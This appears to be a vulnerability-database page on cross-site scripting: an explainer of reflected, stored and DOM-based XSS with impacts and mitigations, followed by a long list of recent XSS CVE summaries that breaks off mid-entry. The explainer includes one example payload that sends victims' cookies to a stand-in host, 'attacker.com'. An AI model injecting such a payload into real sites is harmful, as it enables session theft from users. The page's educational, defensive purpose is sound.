Skip to main content

Cross-Site Scripting

web MEDIUM

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.

How It Works

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.

The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.

A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.

Impact

  • Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
  • Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
  • Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
  • Keylogging: Monitor and exfiltrate everything users type on the compromised page
  • Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
  • Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests

Real-World Examples

A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.

eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.

British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.

Mitigation

  • Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
  • Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
  • HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
  • Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
  • DOM-based XSS prevention: Use safe APIs like textContent instead of innerHTML; avoid passing user data to dangerous sinks like eval()

Recent CVEs (38827)

EPSS 0% CVSS 9.6
CRITICAL Act Now

Reflected cross-site scripting in Immich (commits 4ffa26c9 through pre-4eb1003) allows a single-click account takeover of any authenticated user by abusing the unvalidated continue query parameter on /auth/login, which is passed directly to SvelteKit's redirect() without scheme or origin checks. The payload executes attacker-controlled JavaScript inside Immich's origin and uses the victim's session to mint an all-permission API key, yielding persistent compromise. No public exploit identified at time of analysis, but the upstream fix commit and a detailed GHSA advisory describe the flaw clearly enough to derive a working PoC.

XSS Immich
NVD GitHub
EPSS 1% CVSS 5.4
MEDIUM PATCH This Month

Stored XSS in Gogs's Jupyter notebook (.ipynb) preview allows any registered user to inject arbitrary JavaScript via `data:text/html` URIs that survive the bluemonday sanitization pipeline, affecting all versions prior to 0.14.3. The `POST /-/api/sanitize_ipynb` endpoint uses `p.AllowURLSchemes("data")` without MIME-type gating, unlike the safer `IsSafeDataURI` validator used elsewhere in the codebase, and carries no authentication middleware - making it reachable by any account holder. A proof-of-concept is publicly documented in GHSA-3w28-36p9-w929; no CISA KEV listing or EPSS data is available at time of analysis.

XSS
NVD GitHub
MEDIUM PATCH This Month

Stored XSS in OctoPrint's Suppressed Command Notifications feature enables injection of arbitrary HTML and JavaScript into browser popups triggered by specially crafted G-code print files. Versions up to and including 1.11.7 and pre-release builds 2.0.0rc1 and 2.0.0rc2 are affected. An attacker who successfully delivers a malicious G-code file to a victim can execute scripts in the victim's authenticated browser session, enabling exfiltration of sensitive OctoPrint configuration (including API keys and credentials for privileged users), unauthorized actions within the instance, or disruption of active print jobs. No public exploit has been identified at time of analysis, and the vulnerability was responsibly disclosed.

XSS
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Stored DOM-based XSS in Gogs versions prior to 0.14.3 allows any repository user with write access to inject JavaScript via a crafted milestone name, which executes in another user's browser when they open the New Issue page and interact with the milestone dropdown. The flaw is an incomplete fix for the earlier GHSA-vgjm-2cpf-4g7c, which patched view_content.tmpl but missed the identical sink in new_form.tmpl. A working PoC is published in the GitHub advisory, but no public exploit identified at time of analysis in CISA KEV or EPSS-tracked sources.

XSS Docker
NVD GitHub
EPSS 0%
NONE Awaiting Data

Stored XSS in Revive Adserver allows a low-privileged user to inject malicious JavaScript through their Full Name field, which propagates via system-generated emails into the userlog table and executes in an administrator's browser when viewing userlog-details.php. The attack crosses privilege boundaries - a standard user account becomes a vector for admin-context script execution, enabling session hijacking or unauthorized privileged actions. No public exploit has been identified at time of analysis; a fix adding proper output escaping has been confirmed via HackerOne report #3669623.

XSS PHP Adserver
NVD VulDB
EPSS 0%
NONE Awaiting Data

Revive Adserver's XML-RPC API addUser method contains a validation bypass regression introduced by the patch for CVE-2025-55129, allowing authenticated API users to register usernames containing malicious payloads that enable impersonation of other accounts or deliver stored cross-site scripting attacks against administrative users. Reported via HackerOne (report #3680090), this vulnerability is not listed in CISA KEV and no public exploit has been identified at time of analysis. The provided CVSS vector is a null placeholder with all impact metrics rated N, which directly contradicts the described integrity and confidentiality impacts of stored XSS and account impersonation, and must not be used for risk prioritization.

XSS Authentication Bypass Adserver
NVD VulDB
EPSS 0%
NONE Awaiting Data

Stored XSS in Revive Adserver allows arbitrary JavaScript execution in an administrator's browser by embedding payloads in usernames that are later rendered unsanitized in the audit log details view. The attack persists in the platform's audit trail and fires when any admin reviews the affected log entries - a routine administrative activity, not a rare or unusual trigger. No public exploit has been identified at time of analysis, but the vendor has confirmed a fix by adding proper HTML output escaping to the audit log details rendering path.

XSS Adserver
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

Blind SQL injection in Revive Adserver 6.0.6 and earlier allows a low-privileged authenticated user to exfiltrate database contents via the unsanitized clientid parameter in zone-include.php. The vulnerability is compounded by a concurrent input validation failure that also enables cross-site scripting, reflected in the CWE-79 assignment and CVSS scope-change vector - suggesting the zone-include.php endpoint contains at least two distinct injection classes. No public exploit has been identified at time of analysis, and a fix is available in versions beyond 6.0.6 per the vendor advisory on HackerOne.

SQLi XSS PHP +1
NVD
EPSS 0% CVSS 5.1
MEDIUM Monitor

Reflected XSS in DRIMO CMS search functionality allows remote unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by tricking them into clicking a specially crafted URL containing a malicious payload in the `q` parameter. All versions are affected via the CPE wildcard (cpe:2.3:a:drimo:drimo_cms:*), and the product has been declared End of Life - no security patch will be issued. The sole vendor-acknowledged mitigation, confirmed by CERT-PL, is deletion of the `info.php` file; no public exploit code or KEV listing has been identified at time of analysis.

XSS PHP Drimo Cms
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the ProfileGrid WordPress plugin (all versions through 5.9.9.2) allows authenticated users with Subscriber-level access to inject persistent malicious scripts via the `pm_author_message` parameter in the private messaging function `pm_send_message_to_author`. The injected payload executes in any user's browser upon visiting the affected page, with a changed scope (S:C) meaning impact can extend to the broader WordPress session context - including potential admin account compromise. No public exploit has been identified at time of analysis, and a partial patch in version 5.9.8.5 does not fully remediate the issue, leaving sites running through 5.9.9.2 exposed.

XSS WordPress Profilegrid User Profiles Groups And Communities
NVD
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Reflected XSS in AKIN Software E-Commerce (all versions before 1.25.01.06) enables unauthenticated remote attackers to inject and execute arbitrary JavaScript in a victim's browser by tricking them into following a crafted URL. The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:C) confirms network-reachable exploitation requiring no authentication, with a scope change indicating script execution in the browser context outside the originating document. Reported by TR-CERT; no public exploit code or CISA KEV listing identified at time of analysis.

XSS E Commerce
NVD
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Stored XSS in Crawl4AI's monitor dashboard (versions before 0.8.7) enables an unauthenticated remote attacker to inject persistent malicious markup by submitting a crafted crawl URL or triggering a crafted error message; the payload executes in any operator's browser that subsequently views the dashboard. This flaw is one of six vulnerabilities disclosed together in GHSA-365w-hqf6-vxfg, and its impact is materially amplified in unpatched deployments by a co-disclosed authentication bypass (CWE-306) that left all monitor endpoints, including the dashboard, accessible without credentials. No public exploit code or CISA KEV listing has been identified at time of analysis.

XSS Crawl4ai
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Open VSX Registry does not sanitize SVG files uploaded as extension icons prior to storage, and serves them with Content-Type: image/svg+xml without security headers such as Content-Security-Policy or Content-Disposition: attachment. This allows an attacker to publish an extension with a malicious SVG icon and achieve stored cross-site scripting (XSS) when a user navigates directly to the icon URL. On deployments using local storage, script execution occurs within the Open VSX application origin, enabling session hijacking, authentication token theft, and unauthorized extension publishing. On deployments backed by external storage (such as open-vsx.org with an S3-backed CDN), execution is confined to the storage origin, reducing impact but still permitting phishing attacks and credential harvesting through attacker-crafted pages.

XSS Eclipse Open Vsx
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM POC This Month

Stored Cross-Site Scripting in the Frontend File Manager Plugin for WordPress (versions through 23.6) allows any authenticated subscriber-level user to compromise administrator sessions by injecting malicious script payloads via the frontend file-rename endpoint. The unsanitized filename is persisted as post meta and subsequently rendered unescaped within the WordPress admin File Manager listing, triggering execution whenever an administrator views that interface. A publicly available proof-of-concept exists per WPScan, and no confirmed patched version is identified in available data, making this an unresolved risk for all sites running this plugin at or below version 23.6.

XSS WordPress Frontend File Manager Plugin
NVD WPScan VulDB
EPSS 0% CVSS 7.1
HIGH POC This Week

Reflected cross-site scripting in the Simple Basic Contact Form WordPress plugin (all versions through 20250114) allows unauthenticated remote attackers to execute arbitrary JavaScript in a visitor's browser when the victim follows a crafted link or submits a cross-site forged form that triggers a validation error. Publicly available exploit details have been published by WPScan, though the issue is not listed in CISA KEV and no EPSS data is provided in the input.

XSS WordPress Simple Basic Contact Form
NVD WPScan VulDB
EPSS 0% CVSS 8.9
HIGH PATCH This Week

Stored cross-site scripting in Gogs (self-hosted Git service) versions through 0.14.2 allows a low-privileged repository user to inject JavaScript via a crafted Jupyter notebook (.ipynb) Markdown cell containing a javascript: scheme link, which executes in the Gogs origin when a victim clicks the rendered link. Although server-side sanitization is performed via /-/api/sanitize_ipynb, the client subsequently re-renders Markdown cells with marked() and regenerates the dangerous links, and the file preview page is served without a Content Security Policy. Publicly available exploit code exists (full PoC published in the GHSA advisory) but there is no public exploit identified at time of analysis as actively exploited in the wild.

XSS Python
NVD GitHub
EPSS 0% CVSS 6.4
MEDIUM POC PATCH This Month

Stored cross-site scripting in Filament's ImageColumn and ImageEntry components allows low-privileged authenticated attackers to plant malicious HTML or JavaScript into database-backed image fields, which then executes in the browsers of any user who views the affected table or schema. Affected versions span 4.0.0 through the pre-fix releases across both the v4 and v5 branches of this widely-used Laravel admin panel framework. Vendor-released patches exist at versions 4.11.5 and 5.6.5; no public exploit code or CISA KEV listing has been identified at time of analysis.

XSS Filament
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Reflected XSS in Nuxt 3.x before 3.21.7 and 4.x before 4.4.7 enables client-side script execution in the application's first-party origin when user-controlled input is passed to the `navigateTo()` composable's `open` parameter. The client-side early-open handler invoked `window.open(toPath, ...)` without running the `isScriptProtocol` check that guards the normal navigation path, allowing `javascript:`, `data:`, and `vbscript:` scheme URLs to reach `window.open()` directly. No active exploitation has been confirmed (not listed in CISA KEV), but vendor-released patches are available in versions 4.4.7 and 3.21.7.

XSS Nuxt
NVD GitHub
LOW PATCH Monitor

Reflected XSS in OpenAM's SAML2 federation library (openam-federation-library versions prior to 16.1.1) allows unauthenticated remote attackers to inject arbitrary JavaScript into the OpenAM origin via the Cookie-Hash-Redirect path, exploiting inconsistent output encoding in the FSUtils.postToTarget method. The attack surface is limited to deployments using a non-default clustered configuration; standard single-node deployments are not affected. A vendor-released patch (16.1.1) is available, and no public exploit has been identified at time of analysis.

XSS
NVD GitHub
CVSS 9.3
CRITICAL PATCH Act Now

Reflected cross-site scripting in OpenIdentityPlatform OpenAM versions 13.0.0 through 16.1.0 allows remote attackers to inject arbitrary HTML/JavaScript into the OAuth 2.0/OpenID Connect authorization endpoint response when the form_post response mode is used. The flaw resides in the FormPostResponse.ftl template, which insufficiently sanitizes user-supplied parameters such as state before reflecting them into the rendered HTML. No public exploit identified at time of analysis, but the high CVSS score (9.3) reflects the pre-authentication nature of the attack and the federated-identity context, where script execution in the OpenAM origin can compromise SSO sessions.

XSS
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM This Month

Stored Cross-Site Scripting in Akaunting 3.1.21 allows a high-privileged authenticated user with report creation or update permissions to persist arbitrary HTML/JavaScript in the description field of the report management workflow. Any user - including administrators - who subsequently views the poisoned report will have the malicious script execute in their browser session, enabling session token theft, credential harvesting, or unauthorized UI actions on behalf of the victim. No public exploit code and no CISA KEV listing have been identified at time of analysis, though the stored nature of the payload amplifies impact over reflected XSS variants in shared-user deployments.

XSS Akaunting
NVD GitHub VulDB
EPSS 0% CVSS 4.8
MEDIUM This Month

Stored cross-site scripting in Akaunting 3.1.21 allows an authenticated high-privileged user to inject arbitrary HTML and JavaScript into their profile name, which is subsequently rendered unsanitized in the document timeline displayed on invoice and bill detail pages. Any other authenticated user - including administrators - who views those pages will have the malicious script execute in their browser context, enabling session hijacking, credential theft, or unauthorized actions on their behalf. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog.

XSS Akaunting
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Command injection via untrusted Markdown rendering in the Angular Language Service VS Code extension (versions prior to 21.2.4) allows attackers to execute arbitrary commands on a developer's host when the developer hovers over and clicks a crafted JSDoc tooltip. The client trusts all rendered Markdown (isTrusted: true) while the language server fails to sanitize JSDoc content, enabling embedded command: URIs to fire from malicious source files or npm dependencies. No public exploit identified at time of analysis, but the supply-chain reach via npm packages makes this a notable developer-workstation risk.

XSS Node.js Angular +1
NVD GitHub VulDB
EPSS 0% CVSS 4.8
MEDIUM This Month

Stored cross-site scripting in Akaunting 3.1.21 allows an authenticated user with record creation or modification privileges to embed malicious HTML/JavaScript into record name fields (such as Items), which subsequently executes in any other user's browser session when the reusable delete confirmation dialog renders that name unsanitized. The vulnerability is confirmed by Fluid Attacks security research and affects the shared delete confirmation component across multiple record types. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, and the CVSS 4.0 score of 4.8 reflects the authentication barrier and required victim interaction as meaningful limiting factors.

XSS Akaunting
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Arbitrary code execution in the Angular Language Service VS Code extension prior to 21.2.4 allows attackers to silently run code on a developer's machine simply by having them open a malicious repository in VS Code. The extension reads the typescript.tsdk and js/ts.tsdk.path workspace settings without checking Workspace Trust, then require()s a tsserverlibrary.js file from that attacker-controlled path. No public exploit identified at time of analysis, though the patch diff in PR #68857 clearly illustrates the exploit primitive.

XSS Node.js Angular
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

IBM Engineering Workflow Management 7.0.2 through 7.0.2 Interim Fix 035, 7.0.3 through 7.0.3 Interim Fix 017, and 7.1 through 7.1 Interim Fix 004 is vulnerable to HTTP header injection, caused by. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity.

IBM XSS Engineering Workflow Management
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting in IBM Datacap and Datacap Navigator 9.1.7 through 9.1.9 allows unauthenticated remote attackers to inject and execute arbitrary JavaScript within the Web UI, targeting authenticated users during active sessions. Successful exploitation can lead to credential theft or session hijacking by abusing the trust context of a legitimate user's browser. No public exploit code has been identified at time of analysis, and IBM has released a patch via official advisory.

IBM XSS Datacap +1
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored cross-site scripting in IBM TRIRIGA Application Platform 5.0.2 and 5.0.3 allows an authenticated low-privileged user to inject arbitrary JavaScript into the Web UI, which executes in the browser context of other users who view the affected page - enabling session hijacking and credential theft within trusted sessions. No public exploit code has been identified at time of analysis, and IBM has released a patch via their support advisory. The CVSS score of 5.4 (Medium) reflects the authentication prerequisite and limited direct impact scope, though the credential disclosure risk elevates practical severity for privilege-escalation scenarios.

IBM XSS Tririga Application Platform
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored cross-site scripting in IBM Engineering Workflow Management's Web UI enables an authenticated low-privileged attacker to inject arbitrary JavaScript that executes in the browser sessions of other users, including administrators, within the same trusted application context. Affected versions span 7.0.3 through 7.0.3 Interim Fix 020 and 7.1 through 7.1 Interim Fix 007. The scope-changed CVSS vector (S:C) confirms that impact crosses the attacker's own session boundary, creating a realistic path to credential theft or session hijacking against higher-privileged users. No public exploit code exists and this CVE is not listed in the CISA KEV catalog at time of analysis.

IBM XSS Engineering Workflow Management
NVD
EPSS 0% CVSS 5.1
MEDIUM This Month

Stored Cross-Site Scripting in Digiwin's EasyFlow .NET workflow platform enables authenticated low-privilege attackers to inject persistent JavaScript that executes in other users' browsers on page load. The CVSS 4.0 vector (PR:L/UI:P/SC:L/SI:L) confirms the attacker requires a valid low-privilege account to plant the payload, while victims trigger execution passively by navigating to affected pages - including administrators who may have elevated session privileges worth hijacking. No public exploit code and no CISA KEV listing have been identified at time of analysis, placing real-world risk in the medium tier, concentrated in multi-tenant or shared-user deployments.

XSS Easyflow Net
NVD
EPSS 0% CVSS 7.8
HIGH PATCH This Week

A cross-site scripting vulnerability in the Builder Component of Pilz PASvisu before 1.14.1 allows a local unauthenticated attacker to inject malicious javascript and gain full control over the. Rated high severity (CVSS 7.8), this vulnerability is no authentication required, low attack complexity. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

XSS Pmi V8Xx Pasvisu
NVD
EPSS 0% CVSS 8.1
HIGH PATCH This Week

A stored cross-site scripting vulnerability in the Runtime component of Pilz PASvisu before 1.14.1 and PMI v8xx up to and including 2.0.33992 allows a low-privileged remote unauthenticated attacker. Rated high severity (CVSS 8.1), this vulnerability is remotely exploitable, low attack complexity. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

XSS Pmi V8Xx Pasvisu
NVD
EPSS 0% CVSS 7.1
HIGH POC PATCH This Week

The Transbank Webpay WordPress plugin before 1.14.0 does not sanitize and escape logs to be displayed, allowing unauthenticated users to perform Stored XSS attacks against logged in administrator

WordPress XSS Transbank Webpay
NVD WPScan VulDB
EPSS 0% CVSS 7.1
HIGH POC This Week

The ultimate-woocommerce-auction-pro WordPress plugin through 2.4.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

WordPress XSS Ultimate Woocommerce Auction Pro
NVD WPScan VulDB
EPSS 0% CVSS 6.1
MEDIUM POC This Month

The ultimate-woocommerce-auction-pro WordPress plugin through 2.4.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

WordPress XSS Ultimate Woocommerce Auction Pro
NVD WPScan VulDB
EPSS 0% CVSS 2.0
LOW Monitor

HTML injection in Radware Cyber Controller's HTML Report Generation component allows authenticated remote attackers to embed arbitrary HTML tags - including script-related content - into generated reports, enabling potential cross-site scripting scenarios targeting users who view those reports. All 10.x releases through 10.11.0 are confirmed affected per ENISA EUVD-2026-38198. A public proof-of-concept exploit has been disclosed (CVSS 4.0 E:P); the vendor was notified but did not respond, leaving no vendor-released patch available at time of analysis.

XSS Cyber Controller
NVD VulDB
EPSS 0% CVSS 2.1
LOW POC PATCH Monitor

Reflected cross-site scripting in Suna's authentication endpoint allows remote attackers to execute arbitrary JavaScript in a victim's browser by manipulating the returnURL parameter passed to Next.js router.replace/router.push. All Suna releases from 0.8.0 through 0.8.38 are affected; the flaw spans every auth action (signIn, signUp, resetPassword, signInWithPassword, signUpWithPassword, sendOtpCode, resendMagicLink, installOwner) because none sanitized the returnUrl form field before use. A public proof-of-concept exploit exists (GitHub Gist by TrebledJ); no public exploitation confirmed and the vulnerability is not listed in CISA KEV.

XSS Suna
NVD VulDB GitHub
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Remote code execution in SiYuan note-taking application (before v3.6.1) allows any malicious Bazaar marketplace package author to compromise users via unsanitized HTML rendering of package displayName, description, and README content. Because the Electron renderer is configured with nodeIntegration:true and contextIsolation:false, injected JavaScript pivots directly to arbitrary OS command execution. No public exploit identified at time of analysis, but VulnCheck published a detailed technical advisory documenting both zero-click (metadata) and one-click (README) vectors.

RCE XSS Siyuan
NVD GitHub VulDB
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Remote code execution in SiYuan note-taking application before v3.6.1 occurs when users browse the built-in Bazaar marketplace, because package metadata (displayName, description) and README content are rendered without HTML sanitization. Because the Electron shell ships with nodeIntegration:true and contextIsolation:false, an injected script in the renderer executes arbitrary OS commands as the user. Reported by VulnCheck with detailed vulnerable-code analysis published in the GHSA advisory; no public exploit identified at time of analysis and not listed in CISA KEV.

RCE XSS Siyuan
NVD GitHub VulDB
EPSS 0% CVSS 4.6
MEDIUM PATCH This Month

Stored XSS in Craft CMS 4.x and 5.x allows an authenticated administrator to persist malicious JavaScript payloads in settings fields - section names, volume names, user group names, global set names, generated field names, checkbox/radio option labels, and custom source labels - that execute in other users' control-panel browser sessions when those pages are visited. The attack surface spans seven distinct injection points across the admin settings UI, all sharing the same root defect in Twig template rendering. No public exploit identified at time of analysis, though a proof of concept is documented in the upstream security advisory GHSA-4mgv-366x-qxvx, and the upstream CHANGELOG characterizes the severity as low.

XSS Cms
NVD GitHub VulDB
EPSS 0% CVSS 4.6
MEDIUM PATCH This Month

Stored XSS in Craft CMS's Table field component allows an authenticated administrator to persist arbitrary JavaScript via the Row Heading column type's default values, executing in the browser of any subsequent user who views a page rendering the affected table field. Affected deployments span Craft CMS 4.5.0-beta.1 through 4.16.18 and 5.0.0-RC1 through 5.8.22; patches are available in 4.16.19 and 5.8.23. No public exploit code has been identified at time of analysis and the CVE is not listed in CISA KEV, though the GHSA advisory published a working proof-of-concept payload, and real-world risk is substantially constrained by the non-default allowAdminChanges production setting.

XSS Cms
NVD GitHub VulDB
EPSS 0% CVSS 4.6
MEDIUM PATCH This Month

Stored XSS in Craft CMS (versions 5.0.0-RC1 through 5.8.21) allows an admin-level attacker to permanently embed malicious JavaScript into the User Permissions page by crafting a user group name with an unsanitized HTML payload. The script executes in the browser of any user who subsequently opens the Permissions tab on a user's edit page, creating a persistent cross-user attack vector within the control panel. Vendor-confirmed proof-of-concept steps are publicly documented in GHSA-g3hp-vvqf-8vw6; no confirmed active exploitation or CISA KEV listing at time of analysis.

XSS Cms
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM This Month

Stored cross-site scripting in AVideo's TopMenu plugin through version 26.0 allows payload execution for every site visitor due to unescaped rendering of icon classes, URLs, and text labels across multiple PHP templates. Critically, the saving endpoint (`menuItemSave.json.php`) lacks CSRF token validation despite checking for admin status, enabling a full CSRF-to-stored-XSS chain: an attacker with no account can inject the malicious menu item by luring an authenticated admin to an attacker-controlled page. Publicly available exploit code exists (GHSA-gmpc-fxg2-vcmq); no vendor-released patch has been identified at time of analysis.

XSS Avideo
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Cross-site scripting in Flowise before 3.0.8 allows unauthenticated network attackers to inject malicious JavaScript into the chat interface via iframe javascript: URI payloads, or indirectly via custom agent functions that fetch and render unsanitized external HTTP responses. When a victim browses the affected chat or agent output in their browser, the injected script executes in their session, enabling cookie theft and session hijacking. A working proof-of-concept payload is publicly documented in GitHub Security Advisory GHSA-4fr9-3x69-36wv; no active exploitation is confirmed in CISA KEV at time of analysis.

XSS Flowise
NVD GitHub VulDB
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Cross-site scripting in Nuxt's globally registered NoScript component allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by injecting payload via attacker-controlled slot content, such as URL query parameters. The vulnerability exists in both supported release lines - 3.x before 3.21.7 and 4.x before 4.4.7 - and is rooted in the server-side rendering pipeline writing slot content to innerHTML without escaping, bypassing Vue's normal template sanitization. No active exploitation has been confirmed in CISA KEV; vendor-released patches are available and the fix is a one-line change confirmed in open commit history.

XSS Nuxt
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Apache Atlas's Create Entity page allows any authenticated user to inject persistent malicious JavaScript that executes in other users' browsers. All deployments running Apache Atlas 2.4.0 and earlier are affected. An attacker with a valid account can store a crafted payload that triggers against higher-privileged users - such as administrators - who later view the poisoned entity, enabling session hijacking or credential theft. No public exploit or CISA KEV listing has been identified at time of analysis.

Apache XSS Atlas
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting in Symfony UX Icons (symfony/ux-icons) allows an attacker who controls SVG icon content - via a malicious third-party icon pack, a downloaded icon set, or a tampered Iconify on-demand endpoint - to inject and execute arbitrary JavaScript in the browsers of users who load any page rendering those icons. Two distinct sanitization failures existed: the local-file path in `Icon::fromFile()` only stripped top-level `<script>` children of `<svg>`, ignoring nested scripts and all `on*` event-handler attributes, while the Iconify on-demand path (enabled by default) applied zero sanitization to the remote JSON `body` field before inlining it as HTML. No public exploit code has been identified at time of analysis, and this CVE does not appear in the CISA KEV catalog.

XSS
NVD GitHub VulDB
CVSS 7.5
HIGH POC PATCH This Week

Stored cross-site scripting in the StarCitizenWiki EmbedVideo MediaWiki extension (versions <= 4.0.0) allows any user with page-edit rights to inject arbitrary JavaScript into the data-mw-iframeconfig attribute by supplying a malformed URL or ID containing single quotes for the archiveorg, wistia, or sharepoint services. The flaw is present under the default $wgEmbedVideoRequireConsent=true configuration and executes in the wiki origin for every visitor that loads the affected page, with publicly available exploit code exists in the GHSA advisory.

Microsoft XSS PHP
NVD GitHub
CVSS 4.4
MEDIUM PATCH This Month

Stored XSS in Outerbase Studio's Text Widget (npm/@outerbase/studio <= 0.10.2) allowed arbitrary HTML injection through React's dangerouslySetInnerHTML, enabling script execution in any user who viewed a malicious dashboard. The real-world severity is substantially reduced from legacy disclosures: Outerbase Cloud was discontinued in 2025, leaving the application as a purely client-side tool with no backend, no shared sessions, and no persistent authentication tokens - eliminating the originally described token-theft and account-takeover scenarios. No public exploit identified at time of analysis, though the advisory itself contains a functional reproduction payload.

XSS
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH NO ACTION HOSTED Monitor

Cross-site scripting in Microsoft Edge (Chromium-based) allows an authenticated remote attacker to perform spoofing attacks against users over a network. The flaw stems from improper neutralization of input during web page generation (CWE-79), and while CVSS rates impact as high across confidentiality, integrity, and availability, no public exploit identified at time of analysis.

Microsoft Google XSS +1
NVD VulDB
CVSS 6.1
MEDIUM PATCH This Month

Stored XSS in allure-generator (versions <= 2.38.1) allows arbitrary JavaScript execution in the browser of anyone who views a generated Allure report containing crafted test result data. The vulnerable `ansi.js` Handlebars helper passes unsanitized `statusMessage` and `statusTrace` values - sourced from JUnit XML failure messages and equivalent fields in TRX, xUnit XML, xctest, and Allure 1/2 plugins - through `ansi-to-html` without HTML escaping, then wraps the output in `SafeString` to bypass Handlebars' auto-escape protection. A publicly available proof-of-concept demonstrates exploitation via a crafted JUnit XML file; the attack is particularly relevant to CI/CD environments (Jenkins, GitLab, GitHub Actions) where reports are served on shared infrastructure with active authenticated sessions.

Gitlab Java Jenkins +1
NVD GitHub
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Cross-window message spoofing in TinaCMS (npm tinacms and @tinacms/app) lets a malicious web page hijack an authenticated editing session because the useTina overlay handler, the OAuth authentication popup handler, and the admin↔preview iframe GraphQL reducer act on window.postMessage event.data without validating event.origin or event.source, and reply with wildcard target origins. An attacker who lures an authenticated Tina editor to a crafted page (or gains an opener/iframe relationship with the Tina admin) can forge messages to drive the editor, inject preview content, or observe and forge the OAuth popup channel to take over the session. There is no public exploit identified at time of analysis; a vendor patch is available in PR #7056 and the flaw carries a CVSS 4.0 base score of 7.6.

XSS
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

Server-Side Request Forgery and arbitrary JavaScript injection in Craft CMS 4.x (before 4.18) and 5.x (before 5.10) allow remote unauthenticated attackers to poison the Host or X-Forwarded-Host header against the /actions/app/resource-js endpoint, forcing the backend Guzzle client to proxy attacker-controlled content as application/javascript. When the instance sits behind a caching layer, this chains into web cache poisoning, stored XSS in the Control Panel, and 1-click RCE via session-riding the plugin install action. No public exploit identified at time of analysis, though the GitHub Security Advisory (GHSA-c55v-343g-5xff) provides detailed exploitation mechanics.

SSRF RCE Apache +2
NVD GitHub
CVSS 8.6
HIGH POC PATCH This Week

Stored cross-site scripting in the StarCitizenWiki EmbedVideo MediaWiki extension (versions <= 4.0.0) allows any wiki user to inject arbitrary HTML and JavaScript into rendered pages by abusing the unsanitized class attribute on embed tags such as <youtube>. Because the user-supplied class is concatenated into an HTML template via sprintf without escaping, an attacker can break out of the class attribute and execute script in the context of every visitor that views the page. No public exploit identified at time of analysis beyond the advisory's own PoC, and the issue is not listed in CISA KEV.

PHP XSS
NVD GitHub
CVSS 7.5
HIGH POC PATCH This Week

